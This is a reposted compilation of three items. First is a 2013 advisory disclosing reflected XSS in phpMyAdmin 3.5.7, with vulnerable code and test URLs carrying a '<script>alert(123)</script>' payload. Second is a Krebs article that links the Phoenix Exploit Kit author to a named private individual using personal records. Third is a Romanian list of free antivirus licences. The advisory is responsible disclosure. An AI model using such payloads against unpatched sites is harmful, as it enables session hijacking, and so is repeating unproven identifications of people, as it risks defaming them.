phpMyAdmin 3.5.7 Cross Site Scripting Authored by Janek Vind aka waraxe | Site waraxe.us phpMyAdmin version 3.5.7 suffers from a reflective cross site scripting vulnerability. [waraxe-2013-SA#102] - Reflected XSS in phpMyAdmin 3.5.7 =============================================================================== Author: Janek Vind "waraxe" Date: 09. April 2013 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-102.html Description of vulnerable software: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ phpMyAdmin is a free software tool written in PHP, intended to handle the administration of MySQL over the World Wide Web. phpMyAdmin supports a wide range of operations with MySQL. http://www.phpmyadmin.net/home_page/index.php Affected are versions 3.5.0 to 3.5.7, older versions not vulnerable. ############################################################################### 1. Reflected XSS in "tbl_gis_visualization.php" ############################################################################### Reason: 1. insufficient sanitization of html output Attack vectors: 1. user-supplied parameters "visualizationSettings[width]" and "visualizationSettings[height]" Preconditions: 1. valid session 2. "token" parameter must be known 3. valid database name must be known Php script "tbl_gis_visualization.php" line 51: ------------------------[ source code start ]---------------------------------- // Get settings if any posted $visualizationSettings = array(); if (PMA_isValid($_REQUEST['visualizationSettings'], 'array')) { $visualizationSettings = $_REQUEST['visualizationSettings']; .. <legend><?php echo __('Display GIS Visualization'); ?></legend> <div id="placeholder" style="width:<?php echo($visualizationSettings['width']); ?>px; height:<?php echo($visualizationSettings['height']); ?>px;"> ------------------------[ source code end ]------------------------------------ Tests (parameters "db" and "token" must be valid): http://localhost/PMA/tbl_gis_visualization.php?db=information_schema& token=17961b7ab247b6d2b39d730bf336cebb& visualizationSettings[width]="><script>alert(123);</script> http://localhost/PMA/tbl_gis_visualization.php?db=information_schema& token=17961b7ab247b6d2b39d730bf336cebb &visualizationSettings[height]="><script>alert(123);</script> Result: javascript alert box pops up, confirming Reflected XSS vulnerability. Disclosure timeline: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 31.03.2013 -> Sent email to developers 31.03.2013 -> First response email from developers 02.04.2013 -> Second email from developers - XSS patched in Git repository 03.04.2013 -> phpMyAdmin 3.5.8-rc1 is released 08.04.2013 -> phpMyAdmin 3.5.8 is released 09.04.2013 -> public advisory released Contact: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ come2waraxe@yahoo.com Janek Vind "waraxe" Waraxe forum: http://www.waraxe.us/forums.html Personal homepage: http://www.janekvind.com/ Random project: http://albumnow.com/ ---------------------------------- [ EOF ] ------------------------------------ Sursa: phpMyAdmin 3.5.7 Cross Site Scripting ? Packet Storm

Phoenix Exploit Kit Author Arrested In Russia? The creator of a popular crimeware package known as the Phoenix Exploit Kit was arrested in his native Russia for distributing malicious software and for illegally possessing multiple firearms, according to underground forum posts from the malware author himself. The last version of the Phoenix Exploit Kit. Source: Xylibox.com The Phoenix Exploit Kit is a commercial crimeware tool that until fairly recently was sold by its maker in the underground for a base price of $2,200. It is designed to booby-trap hacked and malicious Web sites so that they foist drive-by downloads on visitors. Like other exploit packs, Phoenix probes the visitor’s browser for the presence of outdated and insecure versions of browser plugins like Java, and Adobe Flash and Reader. If the visitor is unlucky enough to have fallen behind in applying updates, the exploit kit will silently install malware of the attacker’s choosing on the victim’s PC (Phoenix targets only Microsoft Windows computers). The author of Phoenix — a hacker who uses the nickname AlexUdakov on several forums — does not appear to have been overly concerned about covering his tracks or hiding his identity. And as we’ll see in a moment, his online persona has been all-too-willing to discuss his current legal situation with former clients and fellow underground denizens. Exploit.in forum member AlexUdakov selling his Phoenix Exploit Kit. For example, AlexUdakov was a member of Darkode.com, a fairly exclusive English-language cybercrime forum that I profiled last week. That post revealed that the administrator accounts for Darkode had been compromised in a recent break-in, and that the intruders were able to gain access to private communications of the administrators. That access included authority to view full profiles of Darkode members, as well as the private email addresses of Darkode members. AlexUdakov registered at Darkode using the address “nrew89@gmail.com”. That email is tied to a profile at Vkontakte.ru (a Russian version of Facebook) for one Andrey Alexandrov, a 23-year-old male (born May 20, 1989) from Yoshkar-Ola, a historic city of about a quarter-million residents situated on the banks of the Malaya Kokshaga river in Russia, about 450 miles east of Moscow. AKS-74u rifles. Source: Wikimedia Commons. That nrew89@gmail.com address also is connected to accounts at several Russian-language forums and Web sites dedicated to discussing guns, including talk.guns.ru and popgun.ru. This is interesting because, as I was searching AlexUdakov’s Phoenix Exploit kit sales postings on various cybercrime forums, I came across him discussing guns on one of his sales threads at exploit.in, a semi-exclusive underground forum. There, a user with the nickname AlexUdakov had been selling Phoenix Exploit Kit for many months, until around July 2012, when customers on exploit.in began complaining that he was no longer responding to sales and support requests. Meanwhile, AlexUdakov account remained silent for many months. Then, in February 2013, AlexUdakov began posting again, explaining his absence by detailing his arrest by the Federal Security Service (FSB), the Russian equivalent of the FBI. The Phoenix Exploit Kit author explained that he was arrested by FSB officers for distributing malware and the illegal possession of firearms, including two AKS-74U assault rifles, a Glock, a TT (Russian-made pistol), and a PM (also known as a Makarov). In his exploit.in post, AlexUdakov says he lives in a flat with his wife and child. The main portion of the post reads, in part: “On _th of May FSB operative performed a controlled purchase, the money was transferred through WebMoney. 1_ th of July FSB operatives arrested me and conducted searches at the residence, registered address, in the cars that I was using. All computers and storage devices were taken except for… a Wi-Fi router. During the search at the place of residence thy have also taken 2 automatic machine guns AKS74U, Glock, TT handgun, PM Handgun, ammo. I have no criminal record and gave a confession, was released on my own recognizance. I am indicted on 3 charges – conspiracy to distribute malicious software (article 273 of Russian Penal Code), unlawful production of firearms, ammo an explosives (article 223), unlawful possession of weapons, ammo and explosives (article 222)….. …Then there were few months of waiting, and the computer forensic examination took place which attempted to declare the exploit pack to be malware. The examination took place in _Labs, the same place that gave preliminary opinion, which in turn became the basis for opening a criminal case. The examination determined the software (exploit pack) to be malware.” After stumbling on AlexUdakov’s exploit.in thread, I scoured the various hacked forum and affiliate databases I’ve collected over the years. Turns out that a miscreant who adopted the nickname AlexUdakov also was an affiliate of Baka Software, a moneymaking pay-per-install scheme that pushed fake antivirus or “scareware” programs between 2008 and 2009. AlexUdakov registered with Baka using the email address andrey89@nextmail.ru. That email was connected to yet another Vkontakte profile (now banned by Vkontakte for abuse violations), also from Yoshkar-Ola. At this point in the investigation, I called upon a trusted source of mine who has the ability to look up tax records on Russian citizens and businesses, and asked this source if there was a 23-year-old male in Yoshkar-Ola who fit the name in the Vkontakte profile registered to nrew89@gmail.com. A profile photo from the Vkontakte page of Andrey A. Alexandrov The source came back with just one hit: one Andrey Anatolevich Alexandrov, born May 20, 1989, and currently living in a 365-square foot apartment with his wife and small child in Yoshkar-Ola. According to my source, Alexandrov is currently the registered driver of two automobiles, a Lexus RS350 and a 1995 VAZ-2109, a Russian-made hatchback. I can’t say for certain whether the Phoenix Exploit Kit has anything to do with Mr. Alexandrov from Yoshkar-Ola, or indeed whether this young man ever received a visit from the FSB. Requests for comment sent to both emails mentioned in this story went unanswered. And it is certainly possible that the AlexUdakov persona who sold his crimeware package on so many underground forums simply assumed the real-life identity of an innocent man. But based on previous investigations such as this one, it would not be a stretch to conclude that the two identities are one and the same. Readers of this blog sometimes have trouble believing that people involved in selling and distributing malware and crimeware would be so careless about separating their online selves from their real lives. The reality is that many top players in this space consistently show that, although they may posses fairly advanced offensive hacking skills, they are not so expert at defense. This general lack of operational security could be the result of several factors. First, many involved in cybercrime may believe (perhaps rightly so) that it is unlikely that authorities in their countries will ever take an interest in their activities. Also, some fraudsters even like to boast about their crimes, and probably some cybercrooks simply don’t view what they do as serious criminal activity, and thus see little reason to hide. But far more common is the bright kid who is gradually pulled into the darker side of the Underweb, and who almost invariably leaves behind a cumulative trail of clues that point to his real-life identity — all because he never expected to achieve success or make serious money from his illicit activities. I’d like to add a special note of thanks to “Filosov” and Aleksey for their help with the Russian-to-English translations in this post. Sursa: Phoenix Exploit Kit Author Arrested In Russia? — Krebs on Security

[h=2]Licente gratuite pentru 10 Programe : Securitate[/h]by Windows Blog România (Notes) on Sunday, April 7, 2013 Am decis sa alcatuim saptamanal cate o lista cu ultimele promotii pentru 10 programe. Si vom incepe cu ceea ce este mai folositor, Securitatea! BitDefender Total Security 2013 – 90 de zile licenta GRATUITA –http://www.downloadcrew.com/article/27729-bitdefender_total_security Norton Antivirus 2013 – 6 luni licenta GRATUITA –http://www.faravirusi.com/2013/01/30/norton-antivirus-2013-6-luni-licenta-gratuita-2/ Kaspersky Internet Security 2013 – 90 de zile licenta GRATUITA –http://www.faravirusi.com/2013/02/13/kaspersky-internet-security-2013-90-de-zile-licenta-gratuita-2/ Hard Disk Sentinel Standard Edition – licenta GRATUITA pe viata –http://www.faravirusi.com/2013/04/05/hard-disk-sentinel-standard-edition-licenta-gratuita-pe-viata/ Panda Internet Security 2013 – 6 luni de zile licenta GRATUITA –http://www.faravirusi.com/2013/02/19/panda-internet-security-2013-6-luni-de-zile-licenta-gratuita-2/ Panda Antivirus Pro 2013 – licenta GRATUITA 6 luni de zile –Panda Antivirus Pro 2013 – licenta GRATUITA 6 luni de zile Ashampoo WinOptimizer 2013 – licenta GRATUITA –http://www.faravirusi.com/2013/01/30/ashampoo-winoptimizer-2013-licenta-gratuita/ McAfee Internet Security 2013 – 6 luni licenta GRATUITA –McAfee Internet Security 2013 – 6 luni licenta GRATUITA Panda Cloud Antivirus Pro – licenta GRATUITA –Panda Cloud Antivirus Pro – licenta GRATUITA Kaspersky PURE Total Security – licenta gratuita 6 luni –Kaspersky PURE Total Security – licenta gratuita 6 luni Via: https://www.facebook.com/notes/windows-blog-rom%C3%A2nia/licente-gratuite-pentru-10-programe-securitate/431115803642587